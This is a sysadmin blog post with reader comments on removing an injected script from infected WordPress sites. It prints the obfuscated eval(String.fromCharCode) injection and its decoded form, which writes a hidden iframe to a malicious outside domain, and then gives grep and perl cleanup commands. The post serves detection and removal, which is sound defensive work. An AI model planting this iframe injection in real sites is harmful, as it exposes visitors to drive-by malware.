One of my friend asked for help about virus appearing on his sites (mostly WordPress sites). I checked it out and my Kaspersky Internet Security blocked the pages from loading, so i downloaded the files manually and scanned html with Kaspersky to determine affected files.
I noticed that the affected files were PHP and HTML only and if you compare the code of the original WordPress files with the infected one you will see the difference. Below are sample added codes/virus:
HTML files: <script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>
PHP files: <?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>
What it does
I’m not a virus expert and I’m curios on what this portion of code does so i looked at it. In our case the resulting text add this portion of code to the html or php files:
var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');
var t=00001217
and you can see it tries to load an iframe:
<iframe src=http://siplank.com/qqp/ style=display:none>
Virus Removal
You can remove the virus by just deleting the code (sample above) on the affected files. If you need to cleanup hundred of infected files (in our case more than 800) you can do the following:
- Get the list of infected files. You can use grep to search for them
grep -Z -R "eval(String.fromCharCode(118,97,114" /path/to/site/* >> affected_file_list.txt
- Delete the codes by using perl/sed commands. Repeat the commands for every files.
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//' /path/to/affected/file.htm
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//" /path/to/affected/file.php
Or create a bash/shell script to do the cleanup at once:
while read line
do
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//' $line
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//" $line
done < affected_file_list.txt
That’s all.
I don’t know how the attacker gained access to the files and inserted the codes because the file permissions are ok – maybe they gain ftp access.
I’ve just a simple ruby script, it uses nokogiri gem and parse files as xml, so alternative-multiline writings of script or iframe codes can be catched and corrected, maybe it can helps for someone too:
http://linux-tips.org/article/97/multi-conditional-search-and-replace-clearing-a-ftp-trojan-script-example
Well, first of all, sorry for my bad english.
I work on a company which is based on web technology, and we was working on 5 sites on Monday, and all those 5 sites was infected what which not can say for other clients ( they are not infected ). We have scanned our PC-s with Kaspersky, BitDeffender, Norton Internet Security and Norton Antivirus, AVG, Avista, Mcaffe and Nod and non of them find a virus on our PC-s.
Can anyone tell me CLEARLY is the problem in our PC-s or where is this problem.
ps. also we have changed the FTP passwords but no susses yet
@ArKUStudio – based on discussions and comments above, I think it’s better if you cleanup your sites/codes, change ftp passwords, and scan pc’s of those who have access to ftp. Then after that monitor your site if the virus return then check the ftp logs. Also, review file/directory permissions if they world-writable.
Hello ,
It seems kaspersky is blocking my companys website due to a trojan.
Can anyone tell me if it actualy is infected ? We will need to fix it asap if so.
@ Chris – if you receive an Trojan alert on Kaspersky when you visit your site, it’s infected – you need to check your codes for new lines added or replaced.
Very good post, thx for that posting. are you considering putting up alot more reports like this one?
menakutkan,, but good posted. . .
Hi all ,
I am also having the same problem with more than 10 of my site and the only solutions till now I found is manual removal of the code from html or php files ,
does any one have the Idea how to prevent this code injection ?
Many of the website tells that its a virus infection but I think its the Code injection but need the solution to that how we can make our website secure from this code injection
Dear All Got the solution to the problem , just make a backup of the all index and login files and put a code to replace the file if there is any change in the code and you are done , now hacker can’t do any thing any more
Yes its great Adam is saying right this way hacker will keep attacking but your site will not be effected and that’s all
Wtf? // Nov 1, 2011 at 3:56 pm
[...] HEUR:Trojan.Script.Iframe | Linux Sysadmin Blog Proud Member of Team.Fix-9000 Affiliate of Team Roma Founding Member of the former Team [...]
Removing some of this same virus…it seems to be old version of WordPress with out of date timthumb.php which allows upload of .pl or .js files to the file_upload directory. Once the script is uploaded, you can then write, change permissions, etc. which then leads to iframes etc.
Make sure to check all temp folders, image upload folders and remove any .pl or .js files in there. Also check code in any .js files in a wordpress install as 99% of the time they are supposed to be php or have been added by an attacker.
Hi there
Happy New Year
Are you offering a service to clean up some pages we run?
Greetings
Alexander
@Gerald-Just because it pops up on Kaspersky doesn’t always mean it’s infected…Kaspersky will deny something and turn it into an Inactive virus. Kaspersky support provided the information with numerous screenshots.
@Katrina — i agree, Kaspersky sometimes detect scripts (ex: php) as virus or dangerous even if they’re not. Of course it’s better to look at the script itself if you doubt the Kaspersky result.
This is also true with other antivirus suites. Thanks for pointing this out!
According to me, Just because it pops up on Kaspersky doesn’t always mean it’s infected, sometimes it is pops up a window to stop scripting.